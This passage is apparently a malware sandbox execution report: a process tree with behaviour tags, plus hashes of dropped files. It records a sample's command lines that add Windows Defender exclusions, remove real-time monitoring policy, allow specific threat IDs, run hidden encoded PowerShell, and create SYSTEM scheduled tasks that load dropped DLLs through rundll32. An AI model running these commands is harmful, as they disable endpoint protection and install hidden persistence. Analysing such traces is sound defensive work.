                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1600
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1720
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:2684
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1980
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2036
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:2556
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:2300
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2460
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2752
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2816
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:996
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2196
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2876
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2492
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2668
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2616
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3020
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1524
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2912
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2688
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "gbfUGSHgt" /SC once /ST 03:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                  3⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3024
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "gbfUGSHgt"
                                                                  3⤵
                                                                    PID:2788
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gbfUGSHgt"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1692
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                    3⤵
                                                                      PID:2076
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1672
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2128
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                        4⤵
                                                                          PID:1728
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "mVwrlHrSDNRLOGqZG" /SC once /ST 03:13:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe\" uL /NafCdidyF 525403 /S" /V1 /F
                                                                        3⤵
                                                                        • Drops file in Windows directory
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:448
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "mVwrlHrSDNRLOGqZG"
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2580
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 628
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Program crash
                                                                        PID:1148
                                                                    • C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe
                                                                      C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe uL /NafCdidyF 525403 /S
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops Chrome extension
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Program Files directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:612
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        3⤵
                                                                          PID:1764
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            PID:1560
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1596
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1792
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:804
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:908
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                6⤵
                                                                                  PID:604
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              PID:2996
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:1948
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:1788
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:684
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:2516
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2384
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:2256
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                      5⤵
                                                                                        PID:2140
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          6⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2136
                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            7⤵
                                                                                              PID:1068
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "bWNXgrRlacKgnUwPKK"
                                                                                      3⤵
                                                                                        PID:932
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                        3⤵
                                                                                          PID:1616
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:2748
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1156
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2088
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  7⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1276
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:848
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2244
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2204
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                  7⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2216
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rksWaXujU\EFzTpY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "AlVsOicJKGYGSUS" /V1 /F
                                                                                          3⤵
                                                                                          • Drops file in Windows directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2188
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "AlVsOicJKGYGSUS2" /F /xml "C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml" /RU "SYSTEM"
                                                                                          3⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2672
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /END /TN "AlVsOicJKGYGSUS"
                                                                                          3⤵
                                                                                            PID:1780
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "AlVsOicJKGYGSUS"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1784
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "HqaqbRPcNxJZrD" /F /xml "C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1860
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "KtgLbJTNbqQVX2" /F /xml "C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1932
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "CaeXOOsQHbNfKhlUh2" /F /xml "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2404
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "eUzrIsCcCKtUEuKCBuS2" /F /xml "C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1972
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "KOXGBKFkHUHlhNtav" /SC once /ST 00:23:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll\",#1 /aNdidF 525403" /V1 /F
                                                                                            3⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1980
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "KOXGBKFkHUHlhNtav"
                                                                                            3⤵
                                                                                              PID:2040
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "mVwrlHrSDNRLOGqZG"
                                                                                              3⤵
                                                                                                PID:2440
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 1540
                                                                                                3⤵
                                                                                                • Loads dropped DLL
                                                                                                • Program crash
                                                                                                PID:2028
                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
                                                                                              2⤵
                                                                                                PID:2288
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
                                                                                                  3⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in System32 directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Enumerates system info in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2704
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "KOXGBKFkHUHlhNtav"
                                                                                                    4⤵
                                                                                                      PID:2668
                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                taskeng.exe {A9D37EFA-5736-4263-8B18-5CF7CD4EAAC9} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
                                                                                                1⤵
                                                                                                  PID:2356
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                    2⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2396
                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      3⤵
                                                                                                        PID:1804
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2276
                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        3⤵
                                                                                                          PID:2736
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1628
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:3052
                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                        1⤵
                                                                                                          PID:876
                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                          1⤵
                                                                                                            PID:2796
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:2656

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              b731bebaa7c2551eed44d76cd5e76ff3

                                                                                                              SHA1

                                                                                                              965b3a0c57891661454681f1f6acbcb282321fd0

                                                                                                              SHA256

                                                                                                              81df7344c54b6be5bece3eacf37ab55125a13111f348b1107af482dfcdb27891

                                                                                                              SHA512

                                                                                                              fa747a132f7ea38ae407808fe298243f21d7bb725e79c2e9ba793f2bacaf3277d958d43355ea53e6871024d9a303a3f1eda7dee46b1d06b5122253d9aad67817

                                                                                                            • C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              3019b73c639d36635656868079266e22

                                                                                                              SHA1

                                                                                                              02ba8c9fae452ba2d13b73330a34a69f5245b550

                                                                                                              SHA256

                                                                                                              2c341aa3858b5cc69c135865c8cdc895afc5011b6e5ec27ecbfe765c076f4d4e

                                                                                                              SHA512

